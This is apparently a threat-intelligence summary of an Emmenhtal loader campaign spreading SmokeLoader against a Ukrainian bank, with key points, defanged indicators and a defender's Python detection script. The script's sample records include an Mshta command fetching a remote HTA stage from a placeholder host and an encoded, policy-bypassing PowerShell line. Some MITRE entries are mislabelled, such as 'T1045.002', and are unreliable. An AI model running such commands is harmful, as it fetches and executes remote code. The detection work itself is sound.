Smoked out – Emmenhtal spreads SmokeLoader malware

This article analyzes a malicious campaign targeting First Ukrainian International Bank that uses a stealthy malware loader called Emmenhtal, which is also used to deliver infostealers such as CryptBot and Lumma and is linked to financially motivated threat actors. The campaign delivers its initial payload in a 7-Zip archive and relies on PowerShell and Mshta to deploy the malware. In this campaign the Emmenhtal loader is the stage that ultimately delivers SmokeLoader through a multi-step infection chain.

Affected: First Ukrainian International Bank, financial sector

Key points:

  • The campaign primarily targets First Ukrainian International Bank (pumb[.]ua).
  • Emmenhtal, also known as Peaklight, is a stealthy malware loader used to distribute infostealers.
  • Infections start with an email containing a deceptive 7-Zip archive.
  • The 7-Zip archive exploits vulnerabilities for malware execution but does not use a previously observed zero-day exploit.
  • Upon extraction, the archive contains a bait PDF and a shortcut to download additional malicious files.
  • The use of PowerShell and Mshta allows for fileless malware execution with minimal visibility.
  • Modified legitimate applications, like DCCW.exe, are used to disguise malware behavior.
  • The chain allows the downloading and execution of SmokeLoader malware.
  • SmokeLoader possesses capabilities for additional malware delivery and credential theft.
  • Emmenhtal Loader’s integration in malware distribution represents a trend towards the use of advanced evasion techniques.
  • Organizations are urged to implement robust security measures, including endpoint security and network monitoring.
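As an added defender-side illustration (not code from the G DATA report or the summary above), the following Python scores constructed Sysmon-style process-creation records against the chain described in the key points: Mshta launched with a remote URL, encoded PowerShell spawned by a script host, and DCCW.exe running from outside System32. The host name, paths and command lines in the sample records are constructed placeholders.

```python
import re

# Constructed process-creation records: (parent image, child image, command line).
# Illustrative only; not telemetry from the report. The URL host is a placeholder.
SAMPLE_EVENTS = [
    ("explorer.exe", "mshta.exe", "mshta.exe http://payload.invalid/stage.hta"),
    ("mshta.exe", "powershell.exe", "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAo"),
    ("powershell.exe", "DCCW.exe", r"C:\Users\Public\Downloads\DCCW.exe"),
    ("explorer.exe", "notepad.exe", r"notepad.exe C:\Users\bob\notes.txt"),
    ("services.exe", "powershell.exe", r"powershell.exe -File C:\scripts\backup.ps1"),
]

# Script hosts that should rarely be the parent of an encoded PowerShell command.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Matches -e, -ec, -en, -enc, -encodedcommand (PowerShell accepts any unique prefix),
# but not -ep (ExecutionPolicy), -ea (ErrorAction) or -exec.
ENCODED_FLAG = re.compile(r"(?i)\s-e(c|n[a-z]*)?(\s|$)")


def classify(parent, child, cmdline):
    """Return the reasons one record resembles the Mshta -> PowerShell -> DCCW.exe chain."""
    reasons = []
    c, cl = child.lower(), cmdline.lower()
    if c == "mshta.exe" and re.search(r"https?://", cl):
        reasons.append("mshta launched with a remote URL (fileless HTA stage)")
    if c == "powershell.exe" and ENCODED_FLAG.search(cmdline):
        reasons.append("encoded PowerShell command line")
        if parent.lower() in SCRIPT_HOSTS:
            reasons.append(f"encoded PowerShell spawned by {parent}")
    # The genuine DCCW.exe lives in System32; a copy elsewhere suggests a modified binary.
    if c == "dccw.exe" and not cl.startswith("c:\\windows\\system32\\"):
        reasons.append("DCCW.exe executed from outside System32 (possible tampered copy)")
    return reasons


def find_suspicious(events):
    """Map each record index to its reasons, keeping only records that matched a rule."""
    return {i: r for i, (p, c, cmd) in enumerate(events) if (r := classify(p, c, cmd))}


if __name__ == "__main__":
    for i, reasons in find_suspicious(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i][1], "->", "; ".join(reasons))
```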

MITRE Techniques:

  • Application Layer Protocol: Web Protocols – T1071: Used for commands via HTTP.
  • Obfuscated Files or Information: Encrypted/Encoded File – T1027: The malware uses encoded JavaScript and PowerShell commands.
  • System Binary Proxy Execution: Mshta – T1218.005: The malware utilizes Mshta to run malicious scripts.
  • Command and Scripting Interpreter: PowerShell – T1059.001: Used for executing encoded PowerShell scripts.
  • Hide Artifacts: NTFS File Attributes – T1564.004: The malware may manipulate file attributes for stealth.
  • Obfuscated Files or Information: Software Packing – T1045.002: Involves the use of packing techniques for malware.
  • Process Discovery – T1057: The malware checks for the existence of certain files on the system.

Indicators of Compromise:

  • [IP Address] 194[.]87[.]31[.]68
  • [IP Address] 88[.]151[.]192[.]165
  • [File] Платiжна_iнструкція.7z
  • [File] Document_main1.pdf.lnk
  • [File] putty1202.exe

Full Story: https://www.gdatasoftware.com/blog/2025/03/38160-emmenhtal-smokeloader-malware